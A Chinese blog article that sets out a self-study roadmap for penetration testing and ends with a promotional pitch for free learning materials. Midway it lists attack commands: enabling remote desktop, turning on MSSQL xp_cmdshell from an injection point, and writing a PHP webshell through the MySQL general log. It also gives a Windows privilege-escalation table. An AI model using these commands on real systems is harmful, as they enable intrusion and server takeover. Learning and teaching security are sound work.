ARTICLE DETAIL

建站实战干货

来自一线的建站与推广经验沉淀,每一条都经过真实交付验证。

听叔一句劝,网站渗透这块水太深,你把握不住!(干货分享)

2026/8/27 14:29:02 拓冰建站 浏览量
听叔一句劝,网站渗透这块水太深,你把握不住!(干货分享) 很多朋友问我想搞网络安全编程重要吗选什么语言呢国内其实正经开设网络安全专业的学校很少大部分同学是来自计算机科学、网络工程、软件工程专业的甚至很多非计算机专业自学的。因此不像这三个专业有系统的课程体系大一教什么大二教什么大三又教什么那么清晰明白网络安全这条路很多都是自学摸索。我从大二开始入坑网络安全至今也有十个年头了也见过许许多多自学成才的例子工作这些年先后学习过C、C、Java、Python、Objective-C、JavaScript、TypeScript现在回过头来有一些自己的思考。很多培训班一上来就给你讲一堆各种攻击手法、各种工具使用很多人搞得一头雾水为什么要学这些这些背后的原理是什么全都不知道。我主张学习网络安全可以像做软件开发中的“敏捷开发”先从一个最小的核心开始逐步迭代已臻完善。这个最小的核心是什么呢如果你是偏向于搞网络渗透的方向这个最小核心就是HTTP Web 漏洞扫描工具先把HTTP协议的工作机制掌握了然后学习Web技术包括前后端如何协同工作浏览器如何工作服务器又是如何处理一个HTTP请求一个网站是如何搭建起来的等等。接着再学习使用一些Web漏洞扫描工具学习网站漏洞的概念开始有“安全”这个意识。围绕Web相关的知识掌握得差不多了然后可以开始迭代起来了1、有了上面这些基本知识可以开始学习各种花式的Web漏洞攻击什么XSS、CSRF、SQL注入、SSRF等等。2、学习漏洞原理的过程中开始熟悉一些Web服务器的工作机制日志技术容器技术这些知识以及背后的操作系统Linux/Windows的基础知识。3、对Web安全有了一些基础开始把眼光从Web放宽到更广阔的网络安全这个时候就需要进一步学习HTTP背后的TCP/IP网络协议族。这时你将会陆续接触到什么是TCP劫持、DNS劫持、ARP欺骗、TCP SYN洪水攻击等等。4、对网络攻击的手法了解到这个阶段现有的工具可能就满足不了你的需要你需要定制一些爬虫、扫描、漏洞POC或其他工具了是时候来学习一些工具编写了你可以开始学习Python编程门槛最低实用性最强。5、安全玩到后面都是在玩漏洞。而学到后面越来越多时间开始接触到操作系统层面的漏洞这个时候你就要开始学习一些C语言通过C知道代码程序底层的执行原理拓展自己在操作系统层面的知识深度。6、有了上面这些技术的打底你的眼界将会被打开但随之而来你会发现自己要学的还有很多但至少到这个时候你不再像一开始那么迷茫而是知道自己接下来该去补充哪些东西。核心1.web安全2.二进制安全包括逆向工程和漏洞利用3.密码学知识其他基础1.软件开发2.数据库原理3.编程语言4.计算机取证分析和隐写术5.网络协议及网络算法6.算法与数据结构7.研究开源工具的基本原理懂得自制工具Web安全1.注入类SQL注入XSS跨站脚本攻击XXE命令执行命令注入bash文件上传文件下载2.信息漏洞源码泄露敏感信息接口员工资料泄露服务器信息泄露3.逻辑类权限绕过条件竞争数据篡改网站工作原理HTTP协议WebserverHTTP协议构成1.http-header构成request response2.http-body 构成request response3.http方法Webserver1.Webserver分类2.Webserver解析流程3.Webserver基础安全编程语言前端htmlcssjavascript后台和脚本语言phpjavapython数据库原理关系型数据库MySQL和非关系型数据库逆向工程1.体系结构机器指令和汇编语言2.编译原理自动机词法分析语法分析3.操作系统系统的加载与引导4.计算机组成原理漏洞挖掘与利用1.逆向工程2.模糊测试3.什么是漏洞4.程序员在什么时候会犯错5.信息收集工具端口子域名代码泄露员工字典6.数据包抓取修改重放工具7.顺手的浏览器及插件火狐Hackbar8.VPS漏洞验证9.分析业务功能10.分析web架构11.针对性的罗列可能的漏洞类型12.详细测试不放过任何一个数据包13.单一利用Getshell敏感信息接口14.组合利用XSSCSRF密码学1.古典密码学凯撒密码移位密码2.现代密码学对称加密体系DESAES和非对称加密体系RSAWin2003wmic RDTOGGLE WHERE ServerName%COMPUTERNAME% call SetAllowTSConnections 1Win2003WinXPREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /fMssql开启xp_cmdshell关闭命令EXEC sp_configure show advanced options, 1; //显示或修改高级选项 RECONFIGURE; EXEC sp_configure xp_cmdshell,0; RECONFIGURE;开启命令EXEC sp_configure show advanced options, 1; RECONFIGURE; EXEC sp_configure xp_cmdshell, 1; RECONFIGURE;在注入点运行上述语句时,如果出现这样的回显,标记message: 配置选项 ‘xp_cmdshell’ 不存在,可执行以下语句EXEC sp_configure show advanced options,1; RECONFIGURE; EXEC sp_configure user connections,1; RECONFIGURE;Mysql日志拿shellset global general_log on; set global general_log_file C:/phpStudy/WWW/sinight.php; select ?php assert($_POST[sinight]); ?; set global general_log off;Windows提权对照表#Security Bulletin #KB #Description #Operating System CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008) MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP) MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016) MS16-098 [KB3178466] [Kernel Driver] (Win 8.1) MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012) MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012) MS16-016 [KB3136041] [WebDAV] (2008/Vista/7) MS15-097 [KB3089656] [remote code execution] (win8.1/2012) MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012) MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012) MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012) MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012) MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8) MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2) MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8) MS14-070 [KB2989935] [Kernel Driver] (2003) MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8) MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8) MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8) MS14-002 [KB2914368] [NDProxy] (2003/XP) MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7) MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7) MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8) MS12-042 [KB2972621] [Service Bus] (2008/2012/win7) MS12-020 [KB2671387] [RDP] (2003/2008/7/XP) MS11-080 [KB2592799] [AFD.sys] (2003/XP) MS11-062 [KB2566454] [NDISTAPI] (2003/XP) MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP) MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista) MS10-092 [KB2305420] [Task Scheduler] (2008/7) MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5) MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista) MS10-048 [KB2160329] [win32k.sys] (XP SP2 SP3/2003 SP2/Vista SP1 SP2/2008 Gold SP2 R2/Win7) MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP) MS09-050 [KB975517] [Remote Code Execution] (2008/Vista) MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0) MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista) MS08-068 [KB957097] [Remote Code Execution] (2000/XP) MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008) MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista) MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000) MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003) MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)Win下面各种文件下载姿势参考backlion表哥的文章以及freebuf的http://www.cnblogs.com/backlion/p/7908563.htmlhttps://www.freebuf.com/articles/system/155147.htmlPython开启HTTP服务Python 2.3python -c “import SimpleHTTPServer as s; s.test();” 8000Python 2.4python -m SimpleHTTPServer 8000Python 3.xpython -m http.server 8000像目前比较火热的开发岗位实属网络安全毕竟国家网络安全法也出台了网络安全等级保护2.0等合规要求也出来了。网络安全对于大部分政企单位来说已经从[可选项]变成了[必选项]。在以前很多政企单位在进行 IT 部门及岗位划分时只有研发和运维部门安全人员直接归属到基础运维部而现在越来越多单位为了满足国家安全法律法规的要求必须成立独立的网络安全部门拉拢各方安全人才、组建 SRC安全响应中心为自己的产品、应用、数据保卫护航。根据国家发布的《网络安全人才实战能力白皮书》数据显示目前中国网络安全人才供应严重匮乏每年高校安全专业培养人才仅有3万余人而网络安全岗位缺口在2027年将达327万缺口高达95%。了解网络安全首先要搞清楚下面这些前提网络安全到底包含哪些技术是否需要会编程网络安全行业有哪些职业方向“我”该如何选择网络安全的职业发展和成长路线是什么如果你是准备学习网络安全黑客或者正在学习下面这些你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】